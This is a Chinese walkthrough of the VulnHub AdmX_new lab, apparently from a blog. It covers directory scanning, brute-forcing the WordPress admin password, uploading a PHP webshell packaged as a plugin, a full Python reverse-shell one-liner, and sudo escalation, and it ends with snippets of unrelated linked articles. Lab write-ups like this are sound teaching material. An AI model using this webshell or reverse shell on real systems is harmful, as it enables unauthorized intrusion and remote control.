AdmX_new
0x00前言
因为环境问题,此次靶场都放在vm上。都为NAT模式。
靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z
需要找到两个flag文件。
0x01信息搜集
搜集IP
确认目标IP为172.16.8.131,进一步信息搜集
获取端口开放情况,版本信息等等。
发现目标有80 端口开启。可以去看看。
发现没有什么功能点,然后直接目录扫描。
发现关键词WP 去查看。发现新页面
点击标签发现会自动跳转,一个网址,通过查看数据包代码里已经把IP地址写死了。但是可以利用BP来将响应包的数据替换掉。
0x02响应包替换。
添加两条规则即可。
替换后,(在浏览器上使用插件要把本地的规则放开,让BP能抓住本地网络的数据包)
看了一圈没有什么可疑的地方,继续信息搜集。
发现admin路径,
经过测试发现。输入admin和输入其他是不一样的所以由此判断。用户名为admin.
直接爆破密码即可。adam14
0x03反弹shell
成功进入后台。
通过上网搜集资料发现 可以通过插件,主题,media等功能点上传木马来进行getshell.
在插件编辑功能点发现了php代码但是不能保存。
上传的文件必须是zip文件还得要符合规则
<?php
/**
* Plugin Name: Shell
* Plugin URI: https://x.github.io
* Description: WP Webshell for Pentest
* Version: 1.0
* Author: kalpa
* Author URI: https://x.github.io
* License: https://x.github.io
*/if(isset($_GET['cmd']))
{system($_GET['cmd']);
}
?>把上面的文件写入php文件,打包成zip上传即可。
然后把插件激活即可。
http://172.16.8.131/wordpress/wp-content/plugins/shell.php?cmd=whoami
访问上面的命令即可命令执行。
然后尝试反弹shell.本次使用python反弹shell.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.8.132",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
反弹成功。
0x04提权
信息搜集,尝试提权。
进入/etc/passwd 查看
发现一个wpadmin用户。去用户目录查看
发现需要wpadmin 有一个txt可能是flag文件。尝试以wpadmin登陆
在wp的配置文件中找到了。如下信息。
尝试连接数据库。 无果。
最后使用登陆 wordpress的密码成功登陆 wpadmin.
0x05二次提权。
尝试把权限提升到root.
sudo提权 使用之前获取到的数据库密码尝试提权。
进过测试发现可以直接使用系统命令。
0x06 拿到第二个flag
0x07总结
靶场用到的一些技术点:BP替换响应包,wordpress框架的测试,sudo提权。
相关文章:
AdmX_new
0x00前言 因为环境问题,此次靶场都放在vm上。都为NAT模式。 靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z 需要找到两个flag文件。 0x01信息搜集 搜集IP 确认目标IP为172.16.8.131,进一步信息搜集 获取端口开放情况,版本信…...
【python3】函数注解
Python 函数注解 (Function Annotations) Python 函数注解 (Function Annotations)函数注解的基本语法基本语法格式示例 特殊类型注解注解信息的存储与访问函数注解的实际用途注意事项小结 函数注解是 Python 的一种特性,用于为函数的参数和返回值添加 元数据。注解…...
leetcode hot100 之【LeetCode 42. 接雨水】 java实现
LeetCode 42. 接雨水 题目描述 给定一个非负整数数组 height 表示柱状图中每个柱子的高度,请你计算按此排列的柱状图能接多少雨水。 示例 1: 输入:height [0,1,0,2,1,0,1,3,2,1,2,1] 输出:6 解释:上面的柱状图可以…...
10月18日,每日信息差
第一、现代汽车集团在上海举办了中国前瞻技术研发中心的发布及启新庆典,宣布成立其全资法人公司 —— 现代前瞻汽车技术开发(上海)有限公司。该中心是集团在海外建立的首个前瞻技术研发中心,专注于自动驾驶、智能座舱、共享出行等…...
Axure科技感元件:打造可视化大屏设计的得力助手
Axure,作为一款专业的原型设计工具,凭借其强大的设计功能、丰富的组件库和灵活的交互能力,成为了许多设计师打造科技感设计的首选工具。其中,Axure科技感元件更是以其独特的魅力和实用性,在数据可视化大屏、登录界面、…...
倍增)
【模板】最近公共祖先(LCA)倍增
P3379 P3379 【模板】最近公共祖先(LCA) # 【模板】最近公共祖先(LCA) ## 题目描述 如题,给定一棵有根多叉树,请求出指定两个点直接最近的公共祖先。 ## 输入格式 第一行包含三个正整数 $N,M,S$&#…...
我的JAVA项目构建
1.Maven maven就是pip 设置maven下载的的jar包位置 换源 下载插件maven-search 配置dependency 2.Tomcat 设置环境变量JAVA_HOME 设置编码方式 方框就是路径的前缀 3.Servlet 新建项目 写一个类继承HttpServlet,复写doGet(应对Get请求),doPost(应对…...
应用层协议 序列化
自定义应用层协议 例子:网络版本计算器 序列化反序列化 序列化:将消息,昵称,日期整合成消息-昵称-日期 反序列化:消息-昵称-日期->消息,昵称,日期 在序列化中,定义一个结构体…...
【HAD】Half-Truth: A Partially Fake Audio Detection Dataset
文章目录 Half-Truth: A Partially Fake Audio Detection Dataset背景key points研究数据集设计评价指标实验基线:utterance-level分类(话语级)基线:segment-level分类(片段级)Half-Truth: A Partially Fake Audio Detection Dataset 会议/期刊:Interspeech 2021 CCF-C…...
OpenAI Prompt generation - 生成和优化Prompt的Prompt
OpenAI Prompt generation - 生成和优化Prompt的Prompt 从头开始创建 Prompt 可能很耗时,所以快速生成 Prompt 可以帮助我们提高效率。 下面是 OpenAI 提供的协助生成 Prompt 的 Prompt。 from openai import OpenAIclient OpenAI()META_PROMPT ""&qu…...
Android技术探索:深入解析Android组件
Android系统以其开放性和多样性,成为了众多开发者的首选平台。在Android应用的开发中,组件(Components)是构建应用的基础元素。深入了解Android组件,对于开发者来说至关重要。本文将详细探讨Android的四大核心组件&…...
使用R-GCN处理异质图ACM的demo
加载和处理数据集 import torch from torch_geometric.datasets import HGBDataset from torch_geometric.transforms import RandomLinkSplit# 加载ACM数据集,这是一个包含论文(paper)、主题(subject)以及它们之间关…...
征程 6E DISPLAY 功能介绍及上手实践
01 功能概述 本文将带大家一起实现单路、多路 MIPI CSI TX 输出、IDU 回写、IDU oneshot 模式、绑定输出 VPS 数据等功能,此处主要介绍各 sample 的实现与使用方法。 02 软件架构说明 本文中绑定 VPS 输出功能基于 libvio API 实现,调用 libvio 提供的…...
安卓窗口wms/input小知识NO_INPUT_CHANNEL剖析
背景: 经常在学员的vip技术群里经常有很多学员会提问一些不太常见的窗口和input的相关的问题,虽然不太常见,但确实是工作中会遇到的一些问题,所以马哥有必要进行一下记录这些窗口技术知识点。 具体分享技术点: input中…...
【2024最新版】Win10下 Java环境变量配置----适合入门小白
首先,你应该已经安装了 Java 的 JDK 了(如果没有安装JDK,请跳转到此网址:http://www.oracle.com/technetwork/java/javase/downloads/index-jsp-138363.html) 笔者安装的是 jdk-8u91-windows-x64 接下来主要讲怎么配…...
)
Servlet 生命周期详解及案例演示(SpringMVC底层实现)
文章目录 什么是Servlet?Servlet生命周期简介1. 初始化阶段:init()方法示例代码: 2. 请求处理阶段:service() 和 doGet()、doPost()方法示例代码: 3. 销毁阶段:destroy()方法示例代码: Servlet生…...
2024 kali系统2024版本,可视化界面汉化教程(需要命令行更改),英文版切换为中文版,基于Debian创建的kali虚拟机
我的界面如下所示 1. 安装 locales sudo apt install locales 2. 生成中文语言环境 sudo locale-gen zh_CN.UTF-8 如果你希望安装繁体中文,可以加入: sudo locale-gen zh_TW.UTF-8 3. 修改 /etc/default/locale 文件 确保有以下内容 LANGzh_CN.UT…...
深入理解 CMake 中的 INCLUDE_DIRECTORIES 与 target_include_directories
在使用 CMake 构建系统时,指定头文件的包含路径是非常常见的一步。对于这个任务,CMake 提供了两种主要的命令:INCLUDE_DIRECTORIES 和 target_include_directories。虽然它们看似类似,但它们的作用范围、应用方式以及适用场景却有…...
【不知道原因的问题】java.lang.AbstractMethodError
项目场景: 提示:这里简述项目相关背景: 遇到了一个问题: java.lang.AbstractMethodError 问题描述 提示:这里描述项目中遇到的问题: 在Java开发中,java.lang.AbstractMethodError是一个常见…...
分布式篇(分布式事务)(持续更新迭代)
一、事务 1. 什么是事务 2. 事务目的 3. 事务的流程 4. 事务四大特性 原子性(Atomicity) 一致性(Consistency) 持久性(Durability) 隔离性(Isolation) 5. MySQL VS Oracle …...
:DTO层代码减少83%,但需绕过这个编译器Bug)
C# 13主构造函数+Records+With表达式三重组合技(.NET 8.0正式版实测):DTO层代码减少83%,但需绕过这个编译器Bug
第一章:C# 13主构造函数案例C# 13 引入了主构造函数(Primary Constructor)语法,允许在类或结构体声明时直接定义构造参数,并自动将参数提升为类型成员(如只读字段或属性),显著简化了…...
深入理解HtmlTextView表格支持:从链接到WebView的完整流程
深入理解HtmlTextView表格支持:从链接到WebView的完整流程 【免费下载链接】html-textview TextView to display simple HTML 项目地址: https://gitcode.com/gh_mirrors/ht/html-textview Android开发中显示HTML内容一直是开发者面临的挑战之一,…...
避坑指南:YOLOv8模型部署到小程序的5个常见错误及解决方案
YOLOv8模型部署到小程序的避坑实战手册 第一次把YOLOv8模型塞进小程序时,我盯着屏幕上那个"500 Internal Server Error"发呆了半小时。这已经是第三次部署失败了,Docker日志里那些红色错误信息像在嘲笑我的天真。后来才发现,原来只…...
OpenClaw文件管理机器人:千问3.5-9B智能归类200+技术文档
OpenClaw文件管理机器人:千问3.5-9B智能归类200技术文档 1. 为什么需要文件管理机器人 我的下载文件夹已经变成了一个数字黑洞——里面堆积着超过200份未分类的技术文档,包括PDF白皮书、Markdown笔记、代码片段和会议录音。每次寻找特定文件都需要在混…...
百川2-13B-4bits量化模型+OpenClaw:自动化测试报告生成器
百川2-13B-4bits量化模型OpenClaw:自动化测试报告生成器 1. 为什么需要自动化测试报告生成 每次代码提交后,看着CI/CD流水线里密密麻麻的JUnit测试报告,我都会陷入一种"数据过载"的焦虑。特别是当测试用例失败时,需要…...
从零到一:借助MCP与Neo4j实现无代码知识图谱的快速落地
1. 为什么你需要无代码知识图谱 想象一下这样的场景:你手头堆积着大量会议记录、产品文档和客户反馈,这些信息就像散落的拼图碎片,彼此之间似乎存在某种联系,但你却找不到合适的方法把它们串联起来。传统的数据处理工具面对这种非…...
WS2812嵌入式驱动:高精度时序与柔性硬件协同设计
1. WS2812驱动库深度解析:面向智能LED夹克的嵌入式底层实现1.1 技术定位与工程需求溯源WS2812并非一个抽象的“库”,而是一类集成控制电路与RGB LED于一体的智能发光单元。其核心价值在于将传统LED驱动中复杂的时序控制、电平转换、电流调节等模拟电路功…...
)
2024版IntelliJ IDEA中文设置保姆级教程(附社区版/专业版差异)
2024版IntelliJ IDEA中文设置全攻略:从安装到疑难排错 刚接触IntelliJ IDEA的开发者常被其强大的功能所震撼,但英文界面却成了第一道门槛。作为JetBrains家族的旗舰IDE,2024版本在本地化支持上有了显著改进,但专业版与社区版的汉化…...
OpenBCI WiFi Shield深度解析:Station模式 vs. Direct模式,如何根据你的实验场景做出最佳选择?
OpenBCI WiFi Shield深度解析:Station模式 vs. Direct模式,如何根据你的实验场景做出最佳选择? 在生物信号采集领域,稳定高效的数据传输是实验成功的关键。OpenBCI WiFi Shield作为专业级脑电/肌电采集设备的核心组件,…...
【hudi学习笔记】深入解析Hudi表设计:核心组件与高效索引机制
1. Hudi表设计的核心组件解析 第一次接触Hudi表设计时,我被它精巧的架构深深吸引。作为一个处理大规模数据湖的开源框架,Hudi通过三个核心组件构建了高效的数据管理机制,这就像建造一栋房子需要稳固的地基、承重墙和屋顶一样缺一不可。 时间轴…...